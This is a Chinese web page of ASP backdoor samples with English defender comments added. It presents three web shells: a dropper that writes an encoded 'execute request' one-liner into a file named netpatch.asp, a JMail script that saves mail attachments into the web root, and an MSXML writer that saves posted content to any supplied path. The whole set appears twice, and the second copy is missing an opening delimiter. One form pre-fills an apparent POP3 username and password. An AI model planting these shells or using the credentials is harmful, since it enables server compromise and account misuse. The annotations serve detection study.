几种另类的ASP后门
2022-06-05 09:11:51
<%
'code by netpatch
' Defender summary: this sample is a web-shell dropper. It creates a Jet (Access)
' database file named netpatch.asp next to the running script and stores one memo
' value in it. Because the file carries an .asp extension, the web server will pass
' it to the ASP engine on request, and any script delimiters in its bytes are run.
' Detection ideas: ASP source that instantiates adox.catalog or the Jet OLE DB
' provider with a data source ending in .asp; newly created .asp files in the web
' root whose content starts with a Jet database header instead of markup.
' Mitigation ideas: deny the application-pool identity write access to any
' directory where scripts execute, and disable COM components the site does not
' need.
dim dbfile,sql
db="netpatch.asp"
' server.mappath turns the relative name into a physical path under the site.
dbfile=server.mappath(db)
' adox.catalog.create writes a new, empty Jet 4.0 database at that path.
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
' Reports the outcome from err.number; the success string means "created
' successfully" and the failure string means "creation failed, reason:".
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
' Re-opens the new file through ADO and adds a single-column table (memo type).
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
' 1 = adOpenKeyset, 3 = adLockOptimistic: an updatable recordset on the table.
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
' The literal below is not readable text. Per the author's own trailing comment it
' stands for the one-line "execute request" payload; presumably the characters
' were chosen so that their stored two-byte form spells that script (verify on a
' sample). A plain-ASCII signature search of this source therefore matches only
' the comment, so scanners should also inspect the bytes of the generated file.
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>" '(remember to remove this comment! one-line backdoor: execute request(“n”))
rs.update
%>
用jmail写文件进硬盘
<%
'codz by kevin1986 [s4t]
' Defender summary: this sample pulls a file onto the web server by reading mail.
' It takes a POP3 account and server name from the posted form, logs in with the
' jmail.pop3 component, selects message item(1) and hands it to saveatta, which
' writes the attachments to disk. Nothing in the visible code authenticates the
' caller or restricts which mail server is contacted.
' Detection ideas: outbound POP3 sessions originating from a web server process;
' ASP source that combines jmail.pop3 with savetofile; the page title and form
' field names shown in the accompanying HTML.
' Mitigation ideas: egress filtering for mail protocols from web tiers, and no
' write permission for the application identity on script-executable directories.
' The HTML form that follows pre-fills account values; treat any such values seen
' in a real incident as indicators and as compromised credentials.
user=request.form("user")
pass=request.form("pass")
popserver=request.form("popserver")
' Runs only when all three fields are non-empty.
if user<>"" and pass<>"" and popserver<>"" then
set objmail = createobject( "jmail.pop3" )
objmail.connect user, pass, popserver
' The jmail.message object created here is replaced on the very next line.
set objmsg=createobject("jmail.message")
set objmsg = objmail.messages.item(1)
' separator is assigned but not read anywhere in the visible code.
separator = ", "
' Calling saveatta here is what performs the file writes; the function never
' assigns a return value, so nothing is appended after the label text.
response.write "attachment name is: " & saveatta & "<br>"
objmail.disconnect
end if
function saveatta()
' Writes every attachment of the global objmsg into the directory of the running
' script (server.mappath(".")), using the attachment's own name as the file name.
' Security relevance: the name and extension come from the mail message and are
' used without any validation, so the sender of the mail decides what file type
' lands in a directory the web server serves. No return value is assigned.
' Review point for defenders: file-integrity monitoring on the web root should
' alert on files created by the web server's own worker process.
set attachments = objmsg.attachments
separator = ", "
response.write "the size of this attachment is: " & objmsg.size & "<br>"
for i = 0 to attachments.count - 1
' separator is cleared on the last item but is never written out.
if i = attachments.count - 1 then
separator = ""
end if
set theatta = attachments(i)
response.write theatta.name
' Unvalidated, message-supplied file name concatenated onto the script directory.
theatta.savetofile(server.mappath(".") & "\" & theatta.name)
response.write "oh!hey guy.....that's ok!"
next
end function
%>
<html>
<head>
<title>jmail save file shell</title>
</head>
<body>
<center>
<form method="post">
user: <input name="user" type=text value="kevin1986"><br>
pass: <input name="pass" type=text value="1986lovinghuan"><br>
pop3: <input name="popserver" type=text value="pop.163.com"><br>
<input type=submit value="get the attachments of the first mail">
</form>
</center>
</body>
</html>
利用xml写马
<%on error resume next%>
<form id="form1" name="form1" method="post" action=''''>
<p>木马内容</p>
<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>
<p>路径</p>
<p><input name="textfield" type="text" size="50" /></p>
<p><input type="submit" name="submit" value="提交" /></p></form>
<p><%response.write "本文件绝对路径"%>
<%=server.mappath(request.servervariables("script_name"))%></p>
<%
' Defender summary: this sample is a file writer built on the MSXML parser. The
' form above has two fields (labelled "trojan content" and "path"); the script
' loads the first as an XML document and saves it to the location named by the
' second. The page also prints its own absolute path on the server, which is an
' information disclosure in itself.
' Security relevance: both values are read with request(...), so they are
' accepted from any request collection, and the destination path is used exactly
' as supplied. There is no caller authentication and no path restriction, and
' the "on error resume next" at the top of the page hides any failure.
' Detection ideas: ASP source where msxml2.domdocument .save receives a value
' derived from the request; requests carrying the field names flashboy and
' textfield; files created by the web worker process outside expected folders.
' Mitigation ideas: restrict write ACLs for the application identity and review
' which directories are allowed to execute scripts.
dim xmlstring
dim xmldoc
xmlstring= request("flashboy")
set xmldoc = server.createobject("msxml2.domdocument")
' The result of loadxml is not checked.
xmldoc.loadxml(xmlstring)
' Request-supplied destination, passed to save without validation.
f=request("textfield")
xmldoc.save(f)
set xmldoc=nothing
%>
'code by netpatch
' NOTE(review): this is a repeated copy of the first listing on the page, and the
' opening script delimiter is missing from this copy.
' Defender summary: web-shell dropper. It creates a Jet (Access) database file
' named netpatch.asp next to the running script and stores one memo value in it;
' the .asp extension makes the web server hand the file to the ASP engine.
' Detection ideas: ASP source using adox.catalog or the Jet OLE DB provider with
' a data source ending in .asp; new .asp files whose content begins with a Jet
' database header. Mitigation: no write access for the application identity on
' script-executable directories; disable unneeded COM components.
dim dbfile,sql
db="netpatch.asp"
' Physical path of the target file under the site.
dbfile=server.mappath(db)
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
' Success string means "created successfully"; failure string means
' "creation failed, reason:".
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
' Re-opens the file through ADO and adds a one-column memo table.
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
' 1 = adOpenKeyset, 3 = adLockOptimistic.
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
' The literal is an encoded stand-in for the payload named in the trailing
' comment, so ASCII signature matching on this source hits only the comment;
' scan the bytes of the generated file as well.
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>" '(remember to remove this comment! one-line backdoor: execute request(“n”))
rs.update
%>
用jmail写文件进硬盘
<%
'codz by kevin1986 [s4t]
' NOTE(review): repeated copy of the JMail listing shown earlier on the page.
' Defender summary: takes a POP3 account and server from the posted form, logs in
' with jmail.pop3, selects message item(1) and calls saveatta, which writes that
' message's attachments to disk. The caller is not authenticated and the mail
' server is not restricted.
' Detection ideas: outbound POP3 from a web server process; ASP source combining
' jmail.pop3 with savetofile. Mitigation: egress filtering for mail protocols and
' no write permission on script-executable directories.
user=request.form("user")
pass=request.form("pass")
popserver=request.form("popserver")
' Runs only when all three fields are non-empty.
if user<>"" and pass<>"" and popserver<>"" then
set objmail = createobject( "jmail.pop3" )
objmail.connect user, pass, popserver
' This object is replaced on the next line.
set objmsg=createobject("jmail.message")
set objmsg = objmail.messages.item(1)
' Assigned but not read in the visible code.
separator = ", "
' The call to saveatta performs the file writes; it returns no value.
response.write "attachment name is: " & saveatta & "<br>"
objmail.disconnect
end if
function saveatta()
' Writes every attachment of the global objmsg into the running script's
' directory under the attachment's own name. The name and extension come from
' the mail message and are not validated, so the mail's sender controls what file
' type is placed in a web-served directory. No return value is assigned.
set attachments = objmsg.attachments
separator = ", "
response.write "the size of this attachment is: " & objmsg.size & "<br>"
for i = 0 to attachments.count - 1
' separator is cleared on the last item but is never written out.
if i = attachments.count - 1 then
separator = ""
end if
set theatta = attachments(i)
response.write theatta.name
' Unvalidated, message-supplied file name concatenated onto the script directory.
theatta.savetofile(server.mappath(".") & "\" & theatta.name)
response.write "oh!hey guy.....that's ok!"
next
end function
%>
<html>
<head>
<title>jmail save file shell</title>
</head>
<body>
<center>
<form method="post">
user: <input name="user" type=text value="kevin1986"><br>
pass: <input name="pass" type=text value="1986lovinghuan"><br>
pop3: <input name="popserver" type=text value="pop.163.com"><br>
<input type=submit value="get the attachments of the first mail">
</form>
</center>
</body>
</html>
利用xml写马
<%on error resume next%>
<form id="form1" name="form1" method="post" action=''''>
<p>木马内容</p>
<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>
<p>路径</p>
<p><input name="textfield" type="text" size="50" /></p>
<p><input type="submit" name="submit" value="提交" /></p></form>
<p><%response.write "本文件绝对路径"%>
<%=server.mappath(request.servervariables("script_name"))%></p>
<%
' NOTE(review): repeated copy of the MSXML listing shown earlier on the page.
' Defender summary: loads the request value flashboy as an XML document and saves
' it to the path given in the request value textfield. Both are read with
' request(...), the path is used exactly as supplied, the caller is not
' authenticated, and "on error resume next" at the top hides failures. The page
' also prints its own absolute server path.
' Detection ideas: msxml2.domdocument .save fed from request data; requests with
' the field names flashboy and textfield. Mitigation: restrict write ACLs for the
' application identity and limit which directories may execute scripts.
dim xmlstring
dim xmldoc
xmlstring= request("flashboy")
set xmldoc = server.createobject("msxml2.domdocument")
' The result of loadxml is not checked.
xmldoc.loadxml(xmlstring)
' Request-supplied destination, passed to save without validation.
f=request("textfield")
xmldoc.save(f)
set xmldoc=nothing
%>